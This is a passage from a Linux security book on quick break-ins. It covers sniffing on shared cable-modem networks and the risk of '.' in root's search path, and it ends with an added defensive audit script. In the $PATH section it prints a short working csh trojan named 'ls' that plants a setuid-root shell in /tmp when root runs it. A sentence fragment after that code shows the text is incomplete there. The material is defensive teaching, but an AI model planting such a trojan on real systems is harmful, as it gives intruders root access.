Chapter 3. Quick and Easy Break-Ins and How to Avoid Them
3.3 Selected Short Subjects
3.3.1 Cable Modems
Danger Level
Cable modems are now quite common for providing Internet access to home systems. They have high bandwidth and are reasonably reliable, though less so than standard modem or DSL service. Home users are not used to worrying much about security because a modem on a standard (analog) phone is a private connection into the ISP's equipment that transports only that user's data. In other words, communication via modem is private in that nobody else can sniff your data if they do not have direct access to your home network or to the network of whatever remote system you are interacting with.
The rules are different with cable modems, however. All the cable modems in a neighborhood of up to 100 or so systems are in a local area network (LAN) configuration. Windows users who enable "Network Neighborhood" discover this when 10 or 100 systems they have never heard of pop up on their desktop window. Regardless of whether you are running Linux, Windows, or something else, this opens up serious security holes. These other systems can sniff the network for any unencrypted data that you transmit, such as passwords supplied for telnet, FTP, POP, or IMAP. Note that some modern cable systems do not have the problem because they use true routers to protect each customer. Some DSL connections might have this problem, as do some wireless arrangements.
The solution is to use only encrypted protocols such as SSL and SSH. Keep in mind too that sharing a LAN with strangers opens up your systems to various protocol-level exploits that require access to your LAN. These exploits include spoofed UDP and TCP addresses (because the cracker can see your response by putting his interface in promiscuous mode, even though the response is not sent to his "real" address). Other exploits are available by poisoning your ARP cache and by his changing your system's MAC address or his own. See "Preventing ARP Cache Poisoning" for a discussion of poisoning ARP caches.
The solution is to act as if you have untrusted people on the LAN, because you do. Certainly, if you have any non-Linux systems, you will want to configure your Linux box as a firewall. You should send all confidential data via a good encryption method such as SSH or SSL. DSL does not seem to suffer from this LAN problem.
3.3.2 $PATH: Values of . Give Rise to Doom
Danger Level
As many people know, the $PATH environment variable contains a list of directories to search to find the program that the user has requested be executed. It is used if there is no slash in the program name. Typically it contains directories such as /bin, /usr/bin, /usr/local/bin, perhaps $HOME/bin, etc.
The title of this section is inspired from the error message given by the UNIX Version 6 rmdir command if one tried to rmdir ".", except that "doom" was mistyped as "dom" until I pointed this out.
For ordinary users and for root, commonly it also contains "." specifying one's current directory. This is convenient when one develops or uses locally developed scripts or programs. It saves the bother of typing ./widget.
For root, it is one of the worst security holes possible on Linux! A SysAdmin operating as root frequently can be found in almost any directory in the system, including /tmp, home directories of users who might have been compromised or even may be malicious, and directories where insecure applications may be found.
Worse still, frequently "." is listed first in the search path. Thus, all a cracker needs to do is place scripts or programs in such directories with the same name as programs commonly invoked by root, such as ls, who, ps, favorite_editor, etc. For ls, all that would be required would be
#!/bin/csh
# Do nothing unless the invoker owns /bin/su, i.e. is root
if ( ! -o /bin/su ) goto finish
# Plant a setuid-root copy of the shell for later use
cp /bin/sh /tmp/.sh
chmod 4755 /tmp/.sh
finish:
# Run the real ls, hiding the trap file from its own listing
exec /bin/ls $argv | grep -v ls
reason for this is to block this exploit. Perhaps this feature should be added to the other shells. That would not slow someone down by much, because using chmod would work almost as well, as would cp, dd, or a host of other programs. The rule should be that root absolutely must not have "." in the search path and that, if other users do, "." is at the very end of it. Thus, even ordinary users will not be compromised by this very common technique. This even would slightly speed up the system.
Note that some intruders have been known to create such traps with mistyped names of common programs, hoping that someone then would mistype one. Such a trap would catch someone having "." at the end of the search path. This is why root should not have "." anywhere in the search path. The consequences of root having "." in $PATH are too great to allow the risk. Also, it is an excellent idea to do a periodic /bin/ls of directories such as /tmp, /usr/tmp, /var/tmp, FTP's directories, those where CGIs play, and users' home directories, to ensure that these traps have not been planted. An alternative to typing the full path name (/bin/ls) would be to run it from a trusted directory, such as /root, thusly
cd /root
ls /tmp
ls /usr/tmp
etc.
The periodic use of find, invoked from root's crontab, would be an excellent idea.
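The two checks this section calls for, a $PATH audit and a periodic scan of scratch directories for planted traps, as an added example script that is not from the book. It goes a little beyond the text: it flags every relative $PATH entry (an empty entry, ".", "./x" or a bare name all resolve against the current directory), and it compares executables found in the scanned directories against the names in a trusted directory list rather than a fixed list of commands. The PATH_AUDIT_MAIN variable and the trusted-directory argument are this script's own conventions.

```shell
#!/bin/sh
# Added example (not from the book): audit $PATH for current-directory
# entries and scan scratch directories for executables that borrow the
# name of a real command, the trap described in the text.

# Return 0 if PATH contains an entry that resolves relative to the current
# directory: ".", "./x", a bare relative name, or an empty entry (leading,
# trailing or doubled colon), which the shell also treats as ".".
path_has_dot() {
    _p="$1:"                      # trailing colon: every entry ends in ':'
    while [ -n "$_p" ]; do
        _entry="${_p%%:*}"
        _p="${_p#*:}"
        case "$_entry" in
            /*) ;;                # absolute directory: fine
            *)  return 0 ;;       # anything else is relative to "."
        esac
    done
    return 1
}

# Print executables under the scan directories ($2...) whose basename
# matches a command found in one of the trusted directories ($1, colon
# separated, e.g. /bin:/usr/bin). A hit is a candidate planted trap.
find_planted_traps() {
    _trusted="$1"; shift
    # -perm -100: owner execute bit set (octal form works on any find)
    find "$@" -type f -perm -100 2>/dev/null | while IFS= read -r _f; do
        _name="${_f##*/}"
        _t="$_trusted:"
        while [ -n "$_t" ]; do
            _d="${_t%%:*}"; _t="${_t#*:}"
            if [ -x "$_d/$_name" ]; then
                printf '%s\n' "$_f"
                break
            fi
        done
    done
}

# Stand-alone use: PATH_AUDIT_MAIN=1 sh path_audit.sh
if [ "${PATH_AUDIT_MAIN:-0}" = 1 ]; then
    if path_has_dot "$PATH"; then
        echo "WARNING: PATH has a current-directory entry: $PATH"
    fi
    find_planted_traps /bin:/usr/bin /tmp /usr/tmp /var/tmp
fi
```

Run from root's crontab with PATH_AUDIT_MAIN=1 and mail or log the output; any line printed is a file in a scratch directory that would shadow a real command for someone with "." in their search path.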